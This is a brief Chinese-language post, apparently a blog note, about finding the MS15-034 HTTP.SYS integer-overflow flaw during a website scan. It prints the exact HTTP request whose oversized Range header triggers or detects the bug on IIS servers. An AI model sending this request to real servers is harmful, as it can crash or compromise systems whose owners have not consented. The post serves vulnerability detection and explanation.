前一阵子在对某网站进行漏洞扫描时,发现存在MS15-034远程代码执行漏洞。这是一个位于HTTP.SYS中的整数溢出漏洞。UlpParseRange处发生了整数溢出,而在此处导致了安全检查的绕过。具体的分析,还是看360的这篇分析吧。
通过给IIS服务器发送如下格式的HTTP请求,就可以触发(检测)这个漏洞
GET / HTTP/1.1 Host: stuff Range: bytes=0-18446744073709551615
